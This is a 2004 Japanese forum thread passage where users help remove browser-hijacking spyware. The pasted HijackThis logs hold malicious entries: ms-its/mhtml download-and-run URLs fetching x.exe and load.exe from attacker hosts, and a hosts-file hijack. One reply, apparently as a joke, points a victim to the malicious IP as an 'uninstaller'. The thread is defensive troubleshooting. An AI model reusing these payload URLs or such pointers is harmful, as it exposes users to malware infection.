 http://bdc.s15.xrea.com/index.php?option=com_remository&Itemid=59&func=selectfolder&filecatid=1
■IE-SPYAD  IEの制限ゾーンに危険サイトを一括登録  頻度:高
 本家 ttp://www.staff.uiuc.edu/~ehowes/resource.htm
 IE-SPYAD導入の手引き(日本語解説ページ)
 http://www.geocities.jp/ie_spyad_japanese_manual/index.html
 専用スレ http://pc.2ch.net/test/read.cgi/sec/1076041687/

908 :天麩羅屋:04/05/24 14:57 ID:???
《その他リンク集》
■ウィルス関係はこちら↓
【正式】ウィルス情報&質問 総合スレッド☆Part19
 http://pc5.2ch.net/test/read.cgi/sec/1083586576/
■その他セキュリティ関係の質問は↓
 セキュリティ初心者質問スレッドpart41
 http://pc5.2ch.net/test/read.cgi/sec/1084345263/
■アダルトサイト被害対策の部屋
 http://higaitaisaku.web.infoseek.co.jp/
 定番老舗サイト。Hijackthis、その他ツールの使い方が詳しい。質問掲示板あり
■ダイヤルQ2、国際電話、罠サイト、架空請求関係のトラブルはここらで相談。
 【メール・葉書】総合スレッドPartU【架空請求】
   http://that2.2ch.net/test/read.cgi/bouhan/1083110757/
  アダルトサイト対策の部屋
   http://www002.upp.so-net.ne.jp/dalk/higai24.html
  「被害対策の部屋」とは別サイト。有料エロサイト関係のトラブル対策
■国際電話・ダイヤルQ2関連
  http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
  http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
   ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 http://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 http://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 http://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 http://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)
 http://pc5.2ch.net/test/read.cgi/win/1077360806/l50  Proxomitron(Windows板)
 http://pc5.2ch.net/test/read.cgi/software/1060792740/l50  Proxomitron(ソフトウェア板)

909 :天麩羅屋:04/05/24 14:59 ID:???
…とりあえず 以上。

910 :ひよこ名無しさん:04/05/24 15:01 ID:???
greatsearch.biz, jksearch.bizの削除 − ShellServiceObjectDelayLoadを悪用
http://higaitaisaku.web.infoseek.co.jp/removesearchbiz.html

911 :899:04/05/24 15:10 ID:3wHV3tPP
アンインストールとはインストールしないことを指すのでしょうか?

912 :ひよこ名無しさん:04/05/24 15:12 ID:???
ちゃうわい

913 :ひよこ名無しさん:04/05/24 15:13 ID:???
>>911
用語はぐぐれ。
今の俺に言えることはそれだけだ。

914 :899:04/05/24 15:13 ID:3wHV3tPP
>>912  本当の意味を教えてください

915 :ひよこ名無しさん:04/05/24 15:15 ID:???
>>914
http://e-words.jp/

916 :ひよこ名無しさん:04/05/24 15:16 ID:???
>>914
用語は自分で調べろ
http://e-words.jp/w/E382A2E383B3E382A4E383B3E382B9E38388E383BCE383AB.html

917 :899:04/05/24 15:18 ID:3wHV3tPP
>>914 分かりました。とても勉強になりました。ありがとうございます。

918 :899:04/05/24 15:20 ID:3wHV3tPP
訂正
917は
>>915
>>916
でした。

919 :ひよこ名無しさん:04/05/24 15:21 ID:???
>>917
過去の自分に語りかける奴ハケーン

920 :ひよこ名無しさん:04/05/24 18:08 ID:???
ie立ち上げるとcoolサーチみたいなものにホームが変わる。
>>1からの手順やったがダメ。何が悪いのか教えて下さい。
Logfile of HijackThis v1.97.7
Scan saved at 18:04:04, on 2004/05/24
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v5.51 SP2 (5.51.4807.2300)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\system32\Tablet.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\System32\mspmspsv.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE

921 :ひよこ名無しさん :04/05/24 18:09 ID:???
てすと

922 :920:04/05/24 18:09 ID:???
C:\PROGRA~1\Adaptec\DirectCD\directcd.exe
C:\Program Files\Roland\VSC32\vsc32cnf.exe
C:\Program Files\Roland\VSC32\vscvol.exe
G:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
C:\WINNT\system32\internat.exe
C:\Program Files\Sony\VAIO Action Setup\VAServ.exe
C:\Program Files\Sony\Giga Pocket\ReserveModule.exe
C:\Program Files\Sony\Giga Pocket\usbsircs.exe
C:\Program Files\Sony\Giga Pocket\sdvcont2.exe
C:\WINNT\system32\Wtablet\TabUserW.exe
C:\WINNT\system32\imejpmgr.exe
g:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Adaptec\Easy CD Creator 4\CreateCD\createcd.exe
C:\Program Files\Microsoft Office\Office\WINWORD.EXE
C:\WINNT\system32\api32m.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
G:\ダウンロード\HijackThis.exe


923 :920:04/05/24 18:10 ID:???
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Adaptec DirectCD] C:\PROGRA~1\Adaptec\DirectCD\directcd.exe
O4 - HKLM\..\Run: [OmgStartup] C:\Program Files\Common Files\Sony Shared\OpenMG\OmgStartup.exe
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [vsc32cnf.exe] C:\Program Files\Roland\VSC32\vsc32cnf.exe
O4 - HKLM\..\Run: [vscvol.exe] C:\Program Files\Roland\VSC32\vscvol.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\Winampa.exe"
O4 - HKLM\..\Run: [Alogserv] G:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
O4 - HKLM\..\Run: [QuickTime Task] "G:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [api32m] C:\WINNT\system32\api32m.exe
O4 - HKCU\..\Run: [Internat.exe] internat.exe
O4 - HKCU\..\Run: [WLSM.exe] C:\Program Files\NEC\AtermWL\WLSM.exe
O4 - HKCU\..\RunOnce: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - Startup: wsupdate.microsoft.com
O4 - Startup: .0000.aut
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O4 - Global Startup: ntuser.pol

924 :920:04/05/24 18:10 ID:???
O8 - Extra context menu item: Irvineですぐにダウンロード - C:\PROGRA~1\IRVINE~1\ie_menu\iemenu10.htm
O8 - Extra context menu item: Irvineでダウンロード - C:\PROGRA~1\IRVINE~1\ie_menu\iemenu1.htm
O8 - Extra context menu item: Irvineで選択範囲をダウンロード - C:\PROGRA~1\IRVINE~1\ie_menu\iemenu3.htm
O8 - Extra context menu item: IrvineへすべてのURLを送る - C:\PROGRA~1\IRVINE~1\ie_menu\iemenu2.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&1)範囲翻訳 - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/rngtran.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&2)全文翻訳 - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/alltran.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&3)フレーム翻訳 - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/frmtran.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&4)スポット翻訳 - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/spttran.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&5)スポット範囲翻訳 - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/sprtran.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&6)辞書引き... - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/dict.htm
O8 - Extra context menu item: 訳せ!!ゴマ (&7)翻訳設定... - res://C:\Program Files\Aisoft\Goma\Macro\gmie.exe/option.htm


925 :920:04/05/24 18:11 ID:???
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\MAIN.MHT!http://213.159.117.236/buka.chm::/x.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://active.macromedia.com/director/cabs/sw.cab
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/dribnif/jp/win/QuickTimeInstaller.exe
O16 - DPF: {49A3DCEE-FC3C-11D4-83E5-0050DA33C619} (BVXPlayer Class) - http://www.biovirtual.com/xplayer/xplayer.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52/20040105/qtinstall.info.apple.com/mickey/jp/win/QuickTimeInstaller.exe
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004033001/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37868.2968634259
O16 - DPF: {B0C207A3-42EE-11D0-9DB3-00805F8A73C5} (YAMAHA MIDPLUG Control Object) - http://www.yamaha.co.jp/xg/midplug/controls/yamplay.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {D6016EE7-A8FF-11D1-B37E-A4759ECD7909} (AxPulse Class) - http://www.pulse3d.com/players/english/PulsePlayerAxWin.cab



926 :ひよこ名無しさん:04/05/24 18:15 ID:V1NFjaO+
質問です。
IEを開いたら「iSearch」という画面が出てきて困ってます。
テンプレの「まとめサイト」を見て、公式アンインストーラでアンインストールした後、
spybot、Ad-awareを起動して警告が出たものは全部削除したんですが、
それでもIEを起動すると「iSearch」の画面になってしまいます。
どうすれば削除できますか?

927 :ひよこ名無しさん:04/05/24 18:22 ID:???
>>920
あきらかにあやしいのはコレ
C:\WINNT\system32\api32m.exe

常駐ソフト多すぎ。

928 :ひよこ名無しさん:04/05/24 18:23 ID:???
>>920
一番下にアンインストーラがあるけど・・・
http://213.159.117.236/

929 :ひよこ名無しさん:04/05/24 18:30 ID:???
>>926
http://higaitaisaku.web.infoseek.co.jp/index.html
ここ読む

930 :ひよこ名無しさん:04/05/24 18:37 ID:???
群青さん後はよろしくです。

931 :920:04/05/24 18:51 ID:???
さっきまで無かったのにTROJ_STARTPAG.MAと言うウイルスに感染してた…。
常駐ソフトはデフォから弄ってないのでよくわからんです。
やめたほうがいいのかな。

932 :ひよこ名無しさん:04/05/24 18:53 ID:???
騙されたのか?

933 :ひよこ名無しさん:04/05/24 19:17 ID:???
>>920
HijackThis以外のウィンドウをすべて閉じ、下記エントリにチェックを入れて
Fix後、PCを再起動して下さい。

O4 - HKLM\..\Run: [LoadQM] loadqm.exe

O4 - HKLM\..\Run: [api32m] C:\WINNT\system32\api32m.exe

O4 - HKCU\..\Run: [WLSM.exe] C:\Program Files\NEC\AtermWL\WLSM.exe

O4 - Startup: .0000.aut

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\MAIN.MHT!http://213.159.117.236/buka.chm::/x.exe

O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/dribnif/jp/win/QuickTimeInstaller.exe


その後WEB設定のリセット

02 -  〜項目はなかったのかな?

934 :ひよこ名無しさん:04/05/24 19:34 ID:???
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__  いらないPCを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄

935 :920:04/05/24 19:52 ID:???
再起動したら02が増えた…。とりあえず933の手順をやって見ます。thx。
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O1 - Hosts: 213.159.117.235 auto.search.msn.com
O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000000} - C:\WINNT\system32\msxslab.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Adaptec DirectCD] C:\PROGRA~1\Adaptec\DirectCD\directcd.exe
O4 - HKLM\..\Run: [OmgStartup] C:\Program Files\Common Files\Sony Shared\OpenMG\OmgStartup.exe
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [vsc32cnf.exe] C:\Program Files\Roland\VSC32\vsc32cnf.exe
O4 - HKLM\..\Run: [vscvol.exe] C:\Program Files\Roland\VSC32\vscvol.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\Winampa.exe"
O4 - HKLM\..\Run: [Alogserv] G:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
O4 - HKLM\..\Run: [QuickTime Task] "G:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [animd] C:\WINNT\system32\animd.exe
O4 - HKCU\..\Run: [Internat.exe] internat.exe
O4 - HKCU\..\Run: [WLSM.exe] C:\Program Files\NEC\AtermWL\WLSM.exe
O4 - HKCU\..\RunOnce: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - Startup: wsupdate.microsoft.com
O4 - Startup: .0000.aut
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O4 - Global Startup: ntuser.pol

936 :920:04/05/24 20:08 ID:???
うおぷ。TROJ_STRTPAGE.AUとか言うのも増えた。
何もしてないのに…。

937 :ひよこ名無しさん:04/05/24 20:13 ID:???
>>920

追加で下記エントリにチェックを入れて
Fix後、PCを再起動して下さい。

O1 - Hosts: 213.159.117.235 auto.search.msn.com

O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000000} - C:\WINNT\system32\msxslab.dll

その後もう一度

CoolWebShredderによる自動削除
http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo

WEB設定のリセット

938 :テンプレ修正:04/05/24 20:20 ID:???
天麩羅屋さんいつも乙です。

毎度おなじみテンプレ修正でございます。

>>904 アドレス変更
Opera http://opera.livedoor.com/ やFirefox http://www.mozilla.org/products/firefox/

>>908 新スレ移行
http://pc5.2ch.net/test/read.cgi/win/1084124599/l50  Proxomitron(Windows板)


939 :ひよこ名無しさん:04/05/24 20:53 ID:???
二次元萌えらぼに行くとウイルスに感染するそうだから気をつけてくれ。
http://idol.bbspink.com/test/read.cgi/ascii2d/1084831241/88-
http://pc5.2ch.net/test/read.cgi/hack/1085128702/

940 :そろそろ次スレ立てませう:04/05/24 20:58 ID:???
テンプレ案 >>904-908

941 :ひよこ名無しさん:04/05/24 21:13 ID:???
             ∩
                 | |
                 | |
        ∧_∧   | |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       (  ´Д`)//  < 先生!テンプレ貼っておきます
      /       /     \____________
     / /|    /
  __| | .|    |
  \   ̄ ̄ ̄ ̄ ̄ ̄ ̄\
  ||\             \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

942 :920:04/05/24 21:30 ID:???
C:\WINNT\Downloaded Program Filesにx.exeというファイルがあってウイルスであると、
オンラインスキャンで言われているのだが、そんな名前のファイルは無い…。
どうすれば良いんだ。。

943 :920:04/05/24 21:39 ID:???
自己解決しました。。

944 :789:04/05/24 21:40 ID:QabIvm1P
昨日ここに書き込んだ789です。
テンプレをよんでCoolWebShredder、AD−aware、spybot
を使ったのですが何回やってもここがブラウザを開いたときに出る最初のページです。
http://cashsearch.biz/redir.php

システムの復元もやってみたのですが再起動が終わると
復元できませんでしたと出て、だめでした。
どうすれば直るでしょうか。

945 :961:04/05/24 21:44 ID:???
>>944
HijackThisでチェックすればわかるけど、
R0やR1にhttp://cashsearch.biz/redir.phpが大量にあるはず。
それとR3にも不要なものがあるから削除だ。
わからなければログを貼ってみれば見るけど。

946 :ひよこ名無しさん:04/05/24 21:45 ID:???
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| はい、ありがとうございます!
| 2ちゃんねるサポートセンターです。
\______  _______
         ∨
   (⌒)  ∧_∧ D
    ( ) ( ・∀・)○    ___
パイプ→┗⊂   )D……/◎\
=============================

947 :789:04/05/24 21:51 ID:QabIvm1P
>>945
親切なレスありがとうございます。
すみません。R0、R1など良くわかりません。検索してもラグナロクが出てきます。
ろぐとはなんのログなんでしょうか?


948 :ひよこ名無しさん:04/05/24 21:52 ID:???


949 :ひよこ名無しさん:04/05/24 21:53 ID:???
>>947
HijackThisでチェックすればわかるけど

950 :ひよこ名無しさん:04/05/24 21:57 ID:???
>>947
>>46

951 :ひよこ名無しさん:04/05/24 21:59 ID:QabIvm1P
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [SSDPSRV] C:\WINDOWS\SYSTEM\ssdpsrv.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [Machine Debug Manager] C:\WINDOWS\SYSTEM\MDM.EXE
O4 - HKLM\..\RunServices: [SAgent2ExePath] C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Startup: EPSONプリンタウインドウ!3 環境設定(2).lnk = C:\WINDOWS\SYSTEM\E_SRCV02.EXE


952 :ひよこ名無しさん:04/05/24 21:59 ID:QabIvm1P
O4 - Startup: charame.lnk = C:\Program Files\charame\charame.exe
O4 - Startup: バザール付箋紙.lnk = ?
O4 - Startup: BHA シェルゲート.lnk = C:\Program Files\B's Recorder GOLD5\BsShGate.exe
O4 - Global Startup: VAIO Action Setup (サーバー).lnk = C:\Program Files\Sony\VAIO Action Setup\VAServ.exe
O8 - Extra context menu item: &Google Search - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR2.DLL/cmsearch.html
O8 - Extra context menu item: Cac&hed Snapshot of Page - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR2.DLL/cmcache.html
O8 - Extra context menu item: Si&milar Pages - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR2.DLL/cmsimilar.html
O8 - Extra context menu item: Backward &Links - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR2.DLL/cmbacklinks.html
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O9 - Extra button: Real.com (HKLM)
O12 - Plugin for .jp/~suru/dqa4/: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll


953 :ひよこ名無しさん:04/05/24 22:00 ID:QabIvm1P
O12 - Plugin for .wav: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll
O12 - Plugin for .mov: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll
O12 - Plugin for .swf: C:\Program Files\Netscape\Communicator\Program\PLUGINS\npswf32.dll
O12 - Plugin for .png: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin3.dll
O12 - Plugin for .psd: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin2.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.odn.ne.jp/index.html
O15 - Trusted Zone: http://olins.odn.ne.jp
O15 - Trusted Zone: http://olinscs1.odn.ne.jp
O15 - Trusted Zone: http://olinscs2.odn.ne.jp


954 :ひよこ名無しさん:04/05/24 22:01 ID:QabIvm1P
O15 - Trusted Zone: http://olinscs3.odn.ne.jp
O15 - Trusted Zone: http://olinscs4.odn.ne.jp
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} (Yahoo! Audio Conferencing) - http://cs.chat.yahoo.co.jp/v45/yacscom.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {B469C508-9A75-4A62-BFA9-62802D653A4B} (HanGamePluginJP15 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HanGamePluginJP15.cab
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004033001/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {C2FCEF52-ACE9-11D3-BEBD-00105AA9B6AE} (Symantec RuFSI Registry Information Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab

これですよね?説明ページも見ましたがどれを消せばいいか良くわかりません

955 :789:04/05/24 22:02 ID:QabIvm1P
>>951-954は私です。

956 :961:04/05/24 22:05 ID:???
>>789=>>947
そんなこと書くとちゃんとテンプレ読んでないだろ!って突っ込まれるぞ。
どーでもいいけど、英数字は半角で書いた方が良いと思うけどw

で、早速OSやIEのバージョン内緒か?つかMEだろうけど・・・
意外に綺麗なログだなぁ〜

とりあえず、これはFix
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe


957 :ひよこ名無しさん:04/05/24 22:07 ID:???
>>789
その上も貼らないとダメだよ。

958 :ひよこ名無しさん:04/05/24 22:09 ID:QabIvm1P
ウ絵の藻

959 :ぼるじょあ ◆yBEncckFOU :04/05/24 22:12 ID:???
>>958
(・3・) エェー ふざけてるんですKA?

960 :920:04/05/24 22:12 ID:???
943に偽者がー。
ウザイってことか…。今までアドバイスくれた人アリガトネ。

961 :ひよこ名無しさん:04/05/24 22:13 ID:???

ネタでした。

962 :ぼるじょあ ◆yBEncckFOU :04/05/24 22:14 ID:???
>>960
(・3・) エェー ID出さないとロクな回答しか来なかったり騙られるのがオチですよ。

963 :ひよこ名無しさん:04/05/24 22:15 ID:???
789 はネタなの?

964 :ひよこ名無しさん:04/05/24 22:15 ID:QabIvm1P
すみません、切れました。
上のは貼らなくても良いのかと思ってました。
今貼ります


965 :961:04/05/24 22:17 ID:???
テンプレにHijackThisのログは全て貼るを追加か?w
何故、勝手に省略して貼ろうとするか全く理解できん。

>>920
>>1を読めばわかるがID出さずに書けばいずれそうなる。

>>749
それとWindowsUpdateしてる?
しないとまた同じ症状になるのでとっととして下さい。
ウイルス対策プログラムも常駐させること。

966 :920:04/05/24 22:18 ID:OR9h1qgk
>>962そうなのか。あがってしまうからsageてたのだが。
とりあえず、IEのホーム書き換えは直ったっぽいのですが、
C:\WINNT\Downloaded Program Filesにx.exeというファイルがあってウイルスであると、
オンラインスキャンで言われているのだが、そんな名前のファイルは無い…。

と言う状況です。削除の方法がわかりません。


967 :ひよこ名無しさん:04/05/24 22:20 ID:???
てか、来ていきなりログ貼るのも迷惑です。

968 :ひよこ名無しさん:04/05/24 22:22 ID:???
>>966
不可視ファイルを表示する設定に変更しろ。

969 :961:04/05/24 22:23 ID:???
>>920
ここにあるじゃん
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\MAIN.MHT!http://213.159.117.236/buka.chm::/x.exe


970 :ひよこ名無しさん:04/05/24 22:28 ID:QabIvm1P
今もう一度起動したのですが上の部分が表示されません。
保存したログもアプリケーションを選択とでます。
どうすれば良いでしょうか?
ちなみにOSはMeでIEは多分6.0だと思います。

971 :三村:04/05/24 22:30 ID:???
>>970
「たぶん」かよ

972 :ひよこ名無しさん:04/05/24 22:30 ID:???
>>970
あんた誰よ?たぶんってなんだよ?

973 :961:04/05/24 22:31 ID:???
.logはメモ帳で開け!

974 :ひよこ名無しさん:04/05/24 22:34 ID:???
今日はいきなりなヤシばかりですね

975 :920:04/05/24 22:34 ID:OR9h1qgk
C:\WINNT\Downloaded Program Filesがフォルダでなくシステム(ActiveX キャッシュ フォルダ)と言う扱いになってて、
いくら、全てのファイルとフォルダを表示する、オペレーティングシステムの表示にしても
目的のx.exeが表示されない。


976 :ひよこ名無しさん:04/05/24 22:35 ID:QabIvm1P
>>972
すいません、ブラウザが重いので専ブラで書き込んでいたら名前が消えていました。

Logfile of HijackThis v1.97.7
Scan saved at 22:19:23, on 2004/05/24
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE




977 :ひよこ名無しさん:04/05/24 22:36 ID:QabIvm1P
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\PROGRAM FILES\COMMON FILES\EPSON\EBAPI\SAGENT2.EXE
C:\WINDOWS\SYSTEM\RPCSS.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\REAL\REALPLAYER\REALPLAY.EXE
C:\PROGRAM FILES\SONY\VAIO ACTION SETUP\VASERV.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\バザールでござーる\付箋\BAZA_PAD.EXE
C:\PROGRAM FILES\B'S RECORDER GOLD5\BSSHGATE.EXE
C:\PROGRAM FILES\ABONE\ABONE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\MY DOCUMENTS\HIJACKTHIS\HIJACKTHIS.EXE

978 :789:04/05/24 22:37 ID:QabIvm1P
>>976-977はわたしです。

979 :ひよこ名無しさん:04/05/24 22:38 ID:???
だから名乗れって789って名前欄に書けって。
分かりづらいから。

980 :920:04/05/24 22:38 ID:OR9h1qgk
コマンドプロンプトから行けば良いか!

981 :ひよこ名無しさん:04/05/24 22:38 ID:???
>>978
